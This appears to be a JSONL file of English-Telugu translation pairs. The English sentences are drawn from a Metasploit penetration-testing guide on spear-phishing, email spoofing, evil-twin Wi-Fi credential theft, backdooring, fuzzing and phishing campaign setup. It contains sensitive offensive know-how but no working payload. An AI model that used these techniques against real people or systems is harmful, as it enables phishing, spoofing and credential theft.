{"en":"A spear-phishing attack vector is an email attack scenario.","translation":"ఒక స్పియర్-ఫిషింగ్ దాడి వెక్టర్ అనేది ఇమెయిల్ దాడి దృశ్యం.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"In order to spoof your own email address, you will require a sendmail server.","translation":"మీ స్వంత ఇమెయిల్ చిరునామాను మోసగించడానికి, మీకు సెండ్‌మెయిల్ సర్వర్ అవసరం.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The spear-phishing module has three different attack vectors.","translation":"స్పియర్-ఫిషింగ్ మాడ్యూల్‌లో మూడు వేర్వేరు దాడి వెక్టర్లు ఉన్నాయి.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Passing the first option will start the mass email attack.","translation":"మొదటి ఎంపికను పాస్ చేయడం వలన భారీ ఇమెయిల్ దాడి ప్రారంభమవుతుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"SET will launch Metasploit using a resource script.","translation":"SET ఒక వనరు స్క్రిప్ట్‌ను ఉపయోగించి మెటాస్ప్లోయిట్‌ను ప్రారంభిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The SET web attack vector is a unique way of utilizing multiple web-based attacks.","translation":"SET వెబ్ దాడి వెక్టర్ అనేది బహుళ వెబ్-ఆధారిత దాడులను ఉపయోగించుకునే ఒక ప్రత్యేక మార్గం.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"After selecting the HTA Attack Method in SET, we can clone a site.","translation":"SETలో HTA అటాక్ పద్ధతిని ఎంచుకున్న తర్వాత, మేము ఒక సైట్‌ను క్లోన్ చేయవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The multi-attack web method takes web attacks to the next level.","translation":"మల్టీ-అటాక్ వెబ్ పద్ధతి వెబ్ దాడులను తదుపరి స్థాయికి తీసుకువెళుతుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The infectious media generator is a relatively simple attack vector.","translation":"ఇన్‌ఫెక్షియస్ మీడియా జనరేటర్ అనేది సాపేక్షంగా సాధారణ దాడి వెక్టర్.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"SET will create a Metasploit-based payload.","translation":"SET మెటాస్ప్లోయిట్-ఆధారిత పేలోడ్‌ను సృష్టిస్తుంది.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Most antivirus programs nowadays disable autorun.","translation":"నేడు చాలా యాంటీవైరస్ ప్రోగ్రామ్‌లు ఆటోరన్‌ను నిలిపివేస్తాయి.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"UDP Service Sweeper.","translation":"UDP సర్వీస్ స్వీపర్.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"User Account Control (UAC) bypassing.","translation":"వినియోగదారు ఖాతా నియంత్రణ (UAC)ను దాటవేయడం.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Version detection.","translation":"వెర్షన్ గుర్తింపు.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Virtual Network Computing (VNC) injecting remotely.","translation":"వర్చువల్ నెట్‌వర్క్ కంప్యూటింగ్ (VNC)ని రిమోట్‌గా ఇంజెక్ట్ చేయడం.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Vulnerability.","translation":"బలహీనత.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Website attack vectors.","translation":"వెబ్‌సైట్ దాడి వెక్టర్లు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Using Windows 10 machine exploiting.","translation":"విండోస్ 10 మెషిన్‌ను ఉపయోగించి దోపిడీ చేయడం.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Windows binaries backdooring.","translation":"విండోస్ బైనరీలను బ్యాక్‌డోరింగ్ చేయడం.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Windows Local Enumeration (WinEnum) used, for system scraping.","translation":"సిస్టమ్ స్క్రాపింగ్ కోసం విండోస్ లోకల్ ఎన్యూమరేషన్ (WinEnum) ఉపయోగించబడింది.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Windows Management Instrumentation (WMI).","translation":"విండోస్ మేనేజ్‌మెంట్ ఇన్స్ట్రుమెంటేషన్ (WMI).","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Windows Remote Management (WinRM) scanning.","translation":"విండోస్ రిమోట్ మేనేజ్‌మెంట్ (WinRM) స్కానింగ్.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Windows Server machine exploiting.","translation":"విండోస్ సర్వర్ మెషిన్‌ను దోపిడీ చేయడం.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Installing Windows Metasploit.","translation":"విండోస్ మెటాస్ప్లోయిట్‌ను ఇన్‌స్టాల్ చేస్తోంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Wireless MITM attacks.","translation":"వైర్‌లెస్ MITM దాడులు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Setting up wireless MITM attacks.","translation":"వైర్‌లెస్ MITM దాడులను ఏర్పాటు చేయడం.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Performing wireless penetration test with Metasploit.","translation":"మెటాస్ప్లోయిట్‌తో వైర్‌లెస్ చొచ్చుకుపోయే పరీక్షను నిర్వహించడం.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Creating workspaces.","translation":"వర్క్‌స్పేస్‌లను సృష్టించడం.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"User interface (UI).","translation":"వినియోగదారు ఇంటర్‌ఫేస్ (UI).","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Virtual networks reference.","translation":"వర్చువల్ నెట్‌వర్క్‌ల సూచన.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Vulnerable machines URL.","translation":"బలహీనమైన యంత్రాల URL.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"This module will enumerate user accounts in the default domain using PowerShell.","translation":"ఈ మాడ్యూల్ పవర్షెల్ ఉపయోగించి డిఫాల్ట్ డొమైన్లో వినియోగదారు ఖాతాలను లెక్కిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"To test it, I have added the Active Directory Domain Services Role to the Metasploitable 3 machine.","translation":"దీనిని పరీక్షించడానికి, నేను యాక్టివ్ డైరెక్టరీ డొమైన్ సర్వీసెస్ పాత్రను మెటాస్ప్లోయిటబుల్ 3 మెషీన్కు జోడించాను.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Since we do not need to be a privileged user to use this module, it can be very useful during post exploitation.","translation":"ఈ మాడ్యూల్ను ఉపయోగించడానికి మనం ప్రత్యేక అధికారాలు కలిగిన వినియోగదారుగా ఉండవలసిన అవసరం లేదు కాబట్టి, ఇది పోస్ట్ ఎక్స్ప్లోయిటేషన్ సమయంలో చాలా ఉపయోగకరంగా ఉంటుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The Metasploit Framework has almost 1,000 auxiliary modules at the time of writing.","translation":"మెటాస్ప్లోయిట్ ఫ్రేమ్వర్క్లో వ్రాసే సమయానికి దాదాపు 1,000 సహాయక మాడ్యూల్స్ ఉన్నాయి.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"For that reason, in this recipe, we will learn how to build our own auxiliary module.","translation":"ఆ కారణం చేత, ఈ రెసిపీలో, మన స్వంత సహాయక మాడ్యూల్ను ఎలా తయారు చేయాలో నేర్చుకుంటాము.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"CWMP is a protocol used by providers for remote management of customer-premises equipment.","translation":"CWMP అనేది కస్టమర్-ప్రాంగణ పరికరాల రిమోట్ నిర్వహణ కోసం ప్రొవైడర్లు ఉపయోగించే ప్రోటోకాల్.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"When we connect to the router using the CWMP default port 7547, we get the following answer:","translation":"CWMP డిఫాల్ట్ పోర్ట్ 7547ని ఉపయోగించి రౌటర్కు కనెక్ట్ అయినప్పుడు, మనకు ఈ క్రింది సమాధానం వస్తుంది:","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"By using curl with the -v option for verbose, we can see the request made and the reply from the router:","translation":"వివరణాత్మకత కోసం -v ఎంపికతో కర్ల్ను ఉపయోగించడం ద్వారా, చేసిన అభ్యర్థనను మరియు రౌటర్ నుండి వచ్చిన సమాధానాన్ని మనం చూడవచ్చు:","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"With this information, we can build an auxiliary module to scan a target range and identify targets running Huawei home routers with CWMP enabled.","translation":"ఈ సమాచారంతో, లక్ష్య శ్రేణిని స్కాన్ చేయడానికి మరియు CWMP ప్రారంభించబడిన Huawei హోమ్ రౌటర్లను నడుపుతున్న లక్ష్యాలను గుర్తించడానికి మేము ఒక సహాయక మాడ్యూల్ను తయారు చేయవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Since Metasploit probably already has a module with the base features we are looking for, the first thing we should do is search the available modules and see what we can use.","translation":"మెటాస్ప్లోయిట్ ఇప్పటికే మనం వెతుకుతున్న ప్రాథమిక లక్షణాలతో ఒక మాడ్యూల్ను కలిగి ఉండవచ్చు కాబట్టి, మనం చేయవలసిన మొదటి పని ఏమిటంటే అందుబాటులో ఉన్న మాడ్యూల్లను శోధించడం మరియు మనం ఏమి ఉపయోగించవచ్చో చూడటం.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Again, we will just focus on the run method.","translation":"మళ్ళీ, మేము కేవలం రన్ పద్ధతిపై దృష్టి పెడతాము.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"For our module, we will start by changing the initialize method.","translation":"మన మాడ్యూల్ కోసం, మనం initialize పద్ధతిని మార్చడం ద్వారా ప్రారంభిస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Using the register_options data structure, we can specify the default port number for the module.","translation":"register_options డేటా నిర్మాణాన్ని ఉపయోగించి, మనం మాడ్యూల్ కోసం డిఫాల్ట్ పోర్ట్ నంబర్ను పేర్కొనవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Then, we need to compare the response and verify that the equipment is a Huawei Home Gateway.","translation":"అప్పుడు, మనం ప్రతిస్పందనను సరిపోల్చాలి మరియు పరికరం Huawei హోమ్ గేట్వే అని ధృవీకరించాలి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"For that, we will create a new variable called huawei holding the response from our router:","translation":"దాని కోసం, మేము huawei అనే కొత్త వేరియబుల్ను సృష్టిస్తాము, ఇది మా రౌటర్ నుండి వచ్చిన ప్రతిస్పందనను కలిగి ఉంటుంది:","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"If fp == huawei print_good(\"#{ip}\") report_service(:host => rhost, :port => rport, :sname => (ssl ? 'https' : 'http'), :info => \"CWMP - Huawei Home Gateway\") end","translation":"fp == huawei print_good(\"#{ip}\") report_service(:host => rhost, :port => rport, :sname => (ssl ? 'https' : 'http'), :info => \"CWMP - Huawei Home Gateway\") end","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Save the code into a file named huawei_cwmp.rb in /usr/share/metasploit-framework/modules/auxiliary/scanner/http, load the module using msfconsole, set the IP address or range you want to scan, and run the module:","translation":"/usr/share/metasploit-framework/modules/auxiliary/scanner/http లో huawei_cwmp.rb అనే ఫైల్ లో కోడ్ను సేవ్ చేయండి, msfconsole ఉపయోగించి మాడ్యూల్ను లోడ్ చేయండి, మీరు స్కాన్ చేయాలనుకుంటున్న IP చిరునామా లేదా పరిధిని సెట్ చేయండి మరియు మాడ్యూల్ను అమలు చేయండి:","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Since we are saving the output to the current workspace, we can use the host and services command to display the result of the scan:","translation":"మేము అవుట్పుట్ను ప్రస్తుత వర్క్స్పేస్కు సేవ్ చేస్తున్నందున, స్కాన్ ఫలితాన్ని ప్రదర్శించడానికి మేము హోస్ట్ మరియు సర్వీసెస్ కమాండ్ను ఉపయోగించవచ్చు:","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"In this chapter, we will cover the following recipes:","translation":"ఈ అధ్యాయంలో, మేము ఈ క్రింది వంటకాలను కవర్ చేస్తాము:","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Mixins are comprehensive mechanisms in the Ruby language that provide functionality for a module.","translation":"మిక్సిన్లు రూబీ భాషలో సమగ్రమైన విధానాలు, ఇవి ఒక మాడ్యూల్ కోసం కార్యాచరణను అందిస్తాయి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Metasploit has an HTTP GET Request URI Fuzzer that we can use.","translation":"మెటాస్ప్లోయిట్ వద్ద HTTP GET అభ్యర్థన URI ఫజర్ ఉంది, మనం ఉపయోగించవచ్చు.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"We can see the result: Exploring ExploitsChapter 10 [ 336 ]","translation":"మనం ఫలితాన్ని చూడవచ్చు: ఎక్స్‌ప్లోయిట్‌లను అన్వేషించడం అధ్యాయం 10 [ 336 ]","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"In the last recipe, we used an HTTP fuzzer that sent a series of HTTP GET requests with incrementing URL lengths until the service crashed.","translation":"గత రెసిపీలో, మేము ఒక HTTP ఫజర్‌ను ఉపయోగించాము, ఇది సర్వీస్ క్రాష్ అయ్యే వరకు పెరుగుతున్న URL పొడవులతో HTTP GET అభ్యర్థనల శ్రేణిని పంపింది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The basic template to build a fuzzer will be similar to the one we discussed for the development of an auxiliary module.","translation":"ఫజర్ను నిర్మించడానికి ప్రాథమిక టెంప్లేట్ సహాయక మాడ్యూల్ అభివృద్ధి కోసం మేము చర్చించిన దానితో సమానంగా ఉంటుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Now that we have imported the MSF libraries, created a class, and defined the options, the next step will be to define the function that will establish the sock connection.","translation":"ఇప్పుడు మేము MSF లైబ్రరీలను దిగుమతి చేసుకున్నాము, ఒక తరగతిని సృష్టించాము మరియు ఎంపికలను నిర్వచించాము, తదుపరి దశ సాక్ కనెక్షన్‌ను ఏర్పాటు చేసే ఫంక్షన్‌ను నిర్వచించడం.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"The @connected instance variable is used to make the connected variable available to all methods within the class.","translation":"@connected ఉదాహరణ వేరియబుల్ తరగతిలోని అన్ని పద్ధతులకు కనెక్ట్ చేయబడిన వేరియబుల్‌ను అందుబాటులో ఉంచడానికి ఉపయోగించబడుతుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"sock.put is used to send the request using the TCP mixin, and sock.get_once is used get the response from the service, which will time out after one second","translation":"TCP మిక్సిన్ ఉపయోగించి అభ్యర్థనను పంపడానికి sock.put ఉపయోగించబడుతుంది మరియు ఒక సెకను తర్వాత సమయం ముగిసే సర్వీస్ నుండి ప్రతిస్పందనను పొందడానికి sock.get_once ఉపయోగించబడుతుంది.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"It begins by initializing the required variables, which hold the last request sent, the errors, and a counter for the number of iterations.","translation":"ఇది అవసరమైన వేరియబుల్స్‌ను ప్రారంభించడం ద్వారా ప్రారంభమవుతుంది, ఇది చివరి పంపిన అభ్యర్థన, లోపాలు మరియు పునరావృత్తుల సంఖ్య కోసం కౌంటర్‌ను కలిగి ఉంటుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"If the waiting period for the response times out, the service is considered to be down and the iteration number, the length of the URI, and the URI are printed to the screen.","translation":"ప్రతిస్పందన కోసం నిరీక్షణ వ్యవధి ముగిస్తే, సేవ పనిచేయడం లేదని పరిగణించబడుతుంది మరియు పునరావృతం సంఖ్య, URI యొక్క పొడవు మరియు URI తెరపై ముద్రించబడతాయి.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"To start working with the module, we will have to save it in ~/.msf4/modules/auxiliary/fuzzers/http with the name http_fuzzer.rb, then load the module in Metasploit and check the module options.","translation":"మాడ్యూల్‌తో పని చేయడం ప్రారంభించడానికి, మేము దానిని ~/.msf4/modules/auxiliary/fuzzers/httpలో http_fuzzer.rb పేరుతో సేవ్ చేయాలి, ఆపై మెటాస్ప్లోయిట్‌లో మాడ్యూల్‌ను లోడ్ చేసి, మాడ్యూల్ ఎంపికలను తనిఖీ చేయాలి.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Great, our fuzzing module works and it is able to crash the Disk Sorter Enterprise service.","translation":"అద్భుతం, మా ఫజింగ్ మాడ్యూల్ పని చేస్తుంది మరియు ఇది డిస్క్ సార్టర్ ఎంటర్‌ప్రైజ్ సేవను క్రాష్ చేయగలదు.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Penetration testing of wireless networks can present an organization with the real risks of compromise inherent in their wireless infrastructure.","translation":"వైర్‌లెస్ నెట్‌వర్క్‌ల చొచ్చుకుపోయే పరీక్ష సంస్థకు వారి వైర్‌లెస్ ఇన్‌ఫ్రాస్ట్రక్చర్‌లో అంతర్లీనంగా ఉన్న రాజీ యొక్క నిజమైన ప్రమాదాలను అందించగలదు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"In this chapter, we will be covering how Metasploit can help when performing Wi-Fi penetration testing.","translation":"ఈ అధ్యాయంలో, Wi-Fi చొచ్చుకుపోయే పరీక్షను నిర్వహించేటప్పుడు మెటాస్ప్లోయిట్ ఎలా సహాయపడుతుందో మేము కవర్ చేస్తాము.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"We will start by using the Windows Gather Wireless Current Connection Info post-exploitation module to gather information about the current connection on each wireless LAN interface, on the target machine.","translation":"లక్ష్య యంత్రంలో, ప్రతి వైర్‌లెస్ LAN ఇంటర్‌ఫేస్‌లో ప్రస్తుత కనెక్షన్ గురించి సమాచారాన్ని సేకరించడానికి మేము విండోస్ గ్యాదర్ వైర్‌లెస్ కరెంట్ కనెక్షన్ ఇన్ఫో పోస్ట్-ఎక్స్‌ప్లోయిటేషన్ మాడ్యూల్‌ను ఉపయోగించడం ద్వారా ప్రారంభిస్తాము.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Next, we can use the Windows Gather Wireless BSS Info post-exploitation module to gather information about the wireless basic service sets available to the victim machine.","translation":"తరువాత, బాధితుడి యంత్రానికి అందుబాటులో ఉన్న వైర్‌లెస్ ప్రాథమిక సేవా సెట్‌ల గురించి సమాచారాన్ని సేకరించడానికి మేము విండోస్ గ్యాదర్ వైర్‌లెస్ BSS సమాచార పోస్ట్-ఎక్స్‌ప్లోయిటేషన్ మాడ్యూల్‌ను ఉపయోగించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The Windows Gather Wireless Profile module is probably one of the most useful post-exploitation modules for performing wireless penetration testing, because it allows us to extract saved Wireless LAN profiles and get the wireless passphrase.","translation":"వైర్‌లెస్ చొచ్చుకుపోయే పరీక్షను నిర్వహించడానికి విండోస్ గ్యాదర్ వైర్‌లెస్ ప్రొఫైల్ మాడ్యూల్ బహుశా అత్యంత ఉపయోగకరమైన పోస్ట్-ఎక్స్‌ప్లోయిటేషన్ మాడ్యూల్స్‌లో ఒకటి, ఎందుకంటే ఇది సేవ్ చేసిన వైర్‌లెస్ LAN ప్రొఫైల్‌లను సంగ్రహించడానికి మరియు వైర్‌లెస్ పాస్‌ఫ్రేజ్‌ను పొందడానికి అనుమతిస్తుంది.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"An evil twin attack is a type of Wi-Fi attack where a rogue Wi-Fi access point (AP) is used to mimic a legitimate access point provided by a business, such as a coffee shop that offers free Wi-Fi access to its customers.","translation":"ఒక చెడు కవల దాడి అనేది ఒక రకమైన Wi-Fi దాడి, ఇక్కడ ఒక మోసపూరిత Wi-Fi యాక్సెస్ పాయింట్ (AP) ఒక వ్యాపారం అందించే చట్టబద్ధమైన యాక్సెస్ పాయింట్‌ను అనుకరించడానికి ఉపయోగించబడుతుంది, ఉదాహరణకు, దాని వినియోగదారులకు ఉచిత Wi-Fi యాక్సెస్ అందించే కాఫీ షాప్.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"By imitating a legitimate access point, we can trick users into connecting to it, so we can steal credentials, redirect victims to malware sites, perform LLMNR, NBT-NS poisoning attacks, and so on.","translation":"చట్టబద్ధమైన యాక్సెస్ పాయింట్‌ను అనుకరించడం ద్వారా, మేము వినియోగదారులను దానితో కనెక్ట్ అయ్యేలా మోసం చేయవచ్చు, తద్వారా మేము ఆధారాలను దొంగిలించవచ్చు, బాధితులను మాల్వేర్ సైట్‌లకు మళ్లించవచ్చు, LLMNR, NBT-NS విషపూరిత దాడులను నిర్వహించవచ్చు మరియు మొదలైనవి.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"We will start by installing a DHCP server to dynamically configure the victim's IP setting: apt install isc-dhcp-server -y","translation":"బాధితుడి IP సెట్టింగ్‌ను డైనమిక్‌గా కాన్ఫిగర్ చేయడానికి మేము DHCP సర్వర్‌ను ఇన్‌స్టాల్ చేయడం ద్వారా ప్రారంభిస్తాము: apt install isc-dhcp-server -y","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Now that we have our evil twin AP ready, we can test it by using a tool, such as urlsnarf, which will output the URLs sniffed from HTTP traffic in the at0 interface","translation":"ఇప్పుడు మా చెడు కవల AP సిద్ధంగా ఉంది, మేము urlsnarf వంటి సాధనాన్ని ఉపయోగించి దీన్ని పరీక్షించవచ్చు, ఇది at0 ఇంటర్‌ఫేస్‌లోని HTTP ట్రాఫిక్ నుండి స్నిఫ్ చేయబడిన URLలను అవుట్‌పుట్ చేస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"To send emails, you first need to configure the SMTP relay details in the Sending Profiles section.","translation":"ఇమెయిల్స్ పంపడానికి, మీరు మొదటగా పంపే ప్రొఫైల్స్ విభాగంలో SMTP రిలే వివరాలను కాన్ఫిగర్ చేయాలి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"One way to ensure your phishing emails will get to the intended recipients is to use hosted business email solutions such as Zoho Mail.","translation":"మీ ఫిషింగ్ ఇమెయిల్స్ ఉద్దేశించిన గ్రహీతలకు చేరేలా చూసుకోవడానికి ఒక మార్గం ఏమిటంటే Zoho Mail వంటి హోస్ట్ చేసిన వ్యాపార ఇమెయిల్ పరిష్కారాలను ఉపయోగించడం.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Just go to https://www.zoho.com/mail/, create a free business email account, and you are good to go.","translation":"https://www.zoho.com/mail/కి వెళ్ళండి, ఉచిత వ్యాపార ఇమెయిల్ ఖాతాను సృష్టించండి మరియు మీరు వెళ్ళడానికి సిద్ధంగా ఉన్నారు.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"It even allows you to set up a custom domain, which you can use to reinforce your phishing campaign pretext.","translation":"ఇది మీ ఫిషింగ్ ప్రచారం యొక్క నెపాలను బలోపేతం చేయడానికి మీరు ఉపయోగించగల అనుకూల డొమైన్‌ను కూడా ఏర్పాటు చేయడానికి మిమ్మల్ని అనుమతిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Now that you know how to set up and launch a phishing campaign, you can, for example, embed an HTML application link in the phishing email using the Metasploit HTA Web Server exploit module in order to compromise the target.","translation":"ఫిషింగ్ ప్రచారాన్ని ఎలా ఏర్పాటు చేయాలో మరియు ప్రారంభించాలో మీకు ఇప్పుడు తెలుసు, ఉదాహరణకు, లక్ష్యాన్ని రాజీ చేయడానికి Metasploit HTA వెబ్ సర్వర్ ఎక్స్‌ప్లోయిట్ మాడ్యూల్‌ని ఉపయోగించి ఫిషింగ్ ఇమెయిల్‌లో HTML అప్లికేషన్ లింక్‌ను పొందుపరచవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Then, when the target opens the email and runs the HTA, you will get a new session.","translation":"అప్పుడు, లక్ష్యం ఇమెయిల్ తెరిచి HTAని అమలు చేసినప్పుడు, మీకు కొత్త సెషన్ వస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Imagination and practice are your friends; you are not limited to HTA.","translation":"ఊహ మరియు సాధన మీ స్నేహితులు; మీరు HTAకి పరిమితం కాలేదు.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Learn from the adversary; by reading the latest security reports, you can learn about new attack vectors used in the wild and mimic them using Metasploit.","translation":"ప్రత్యర్థి నుండి నేర్చుకోండి; తాజా భద్రతా నివేదికలను చదవడం ద్వారా, మీరు అడవిలో ఉపయోగించే కొత్త దాడి వెక్టర్ల గురించి తెలుసుకోవచ్చు మరియు వాటిని Metasploitని ఉపయోగించి అనుకరించవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Every day new tools are created and new techniques found, so keep up with the industry.","translation":"ప్రతిరోజూ కొత్త సాధనాలు సృష్టించబడతాయి మరియు కొత్త పద్ధతులు కనుగొనబడతాయి, కాబట్టి పరిశ్రమతో కొనసాగండి.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"We have to invest a fair amount of our time practicing and mastering the tools of our trade.","translation":"మన వృత్తి సాధనాలను అభ్యసించడానికి మరియు నేర్చుకోవడానికి మనం తగినంత సమయాన్ని పెట్టుబడి పెట్టాలి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Having a data center where we can set up a lab environment and practice is not always possible and can be quite expensive.","translation":"ప్రయోగశాల వాతావరణాన్ని ఏర్పాటు చేసి సాధన చేయడానికి ఒక డేటా సెంటర్ కలిగి ఉండటం ఎల్లప్పుడూ సాధ్యం కాదు మరియు చాలా ఖరీదైనది కావచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"With cloud services getting cheaper, faster, and easier to use, we do not have an excuse not to have a penetration testing lab.","translation":"క్లౌడ్ సేవలు చౌకగా, వేగంగా మరియు ఉపయోగించడానికి సులభంగా మారడంతో, మనకు పెనెట్రేషన్ టెస్టింగ్ ల్యాబ్ లేకపోవడానికి ఎటువంటి సాకు లేదు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Take for example Azure; create a free account, and you get $200 of credit to explore services for 30 days.","translation":"ఉదాహరణకు Azure తీసుకోండి; ఉచిత ఖాతాను సృష్టించండి మరియు మీరు 30 రోజుల పాటు సేవలను అన్వేషించడానికి $200 క్రెడిట్ పొందుతారు.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"One of the biggest concerns with deploying vulnerable machines is to keep them contained and not expose them to the internet.","translation":"దెబ్బతినే యంత్రాలను మోహరించడంలో అతిపెద్ద సమస్య ఏమిటంటే వాటిని కలిగి ఉంచడం మరియు వాటిని ఇంటర్నెట్‌కు బహిర్గతం చేయకుండా ఉంచడం.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"For this, we can create a virtual network, which will create a logically isolated section in Microsoft Azure with this networking service.","translation":"దీని కోసం, మేము ఒక వర్చువల్ నెట్‌వర్క్‌ను సృష్టించవచ్చు, ఇది ఈ నెట్‌వర్కింగ్ సేవతో Microsoft Azureలో తార్కికంగా వేరు చేయబడిన విభాగాన్ని సృష్టిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Google Cloud Platform and Amazon Web Services (AWS) are also great cloud services on which you can build your lab on; like Azure, they also allow you to create a free account and test their platform, so pick up the one you like most and start practicing.","translation":"Google Cloud Platform మరియు Amazon Web Services (AWS) కూడా గొప్ప క్లౌడ్ సేవలు, వీటిపై మీరు మీ ల్యాబ్‌ను నిర్మించవచ్చు; Azure వలె, అవి మీకు ఉచిత ఖాతాను సృష్టించడానికి మరియు వారి ప్లాట్‌ఫారమ్‌ను పరీక్షించడానికి కూడా మిమ్మల్ని అనుమతిస్తాయి, కాబట్టి మీకు బాగా నచ్చినదాన్ని ఎంచుకుని సాధన చేయడం ప్రారంభించండి.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"If you just want to practice and do not want to build your own lab, you can give Hack The Box a try, go to https:/​/​www.​hackthebox.​eu/​, and hack your way in.","translation":"మీరు సాధన చేయాలనుకుంటే మరియు మీ స్వంత ల్యాబ్‌ను నిర్మించకూడదనుకుంటే, మీరు Hack The Boxని ప్రయత్నించవచ్చు, https:/​/​www.​hackthebox.​eu/​కి వెళ్లండి మరియు మీ మార్గంలోకి ప్రవేశించండి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Hack The Box is an online platform that allows you to test your skills through a series of challenges, some simulating real-world scenarios and others using a CTF approach.","translation":"Hack The Box అనేది ఆన్‌లైన్ ప్లాట్‌ఫారమ్, ఇది మీ నైపుణ్యాలను అనేక సవాళ్ల ద్వారా పరీక్షించడానికి మిమ్మల్ని అనుమతిస్తుంది, కొన్ని నిజ-ప్రపంచ దృశ్యాలను అనుకరిస్తాయి మరియు మరికొన్ని CTF విధానాన్ని ఉపయోగిస్తాయి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"For those who still want to practice but like doing things old-school, you can go to https:/​/ www.​vulnhub.​com/​, download some vulnerable machines, and spin them up on your own hardware.","translation":"ఇప్పటికీ సాధన చేయాలనుకునే మరియు పాత-పాఠశాల పద్ధతిలో విషయాలు చేయాలనుకునే వారి కోసం, మీరు https:/​/ www.​vulnhub.​com/​కి వెళ్ళవచ్చు, కొన్ని బలహీనమైన యంత్రాలను డౌన్‌లోడ్ చేసుకోవచ్చు మరియు వాటిని మీ స్వంత హార్డ్‌వేర్‌లో తిప్పవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
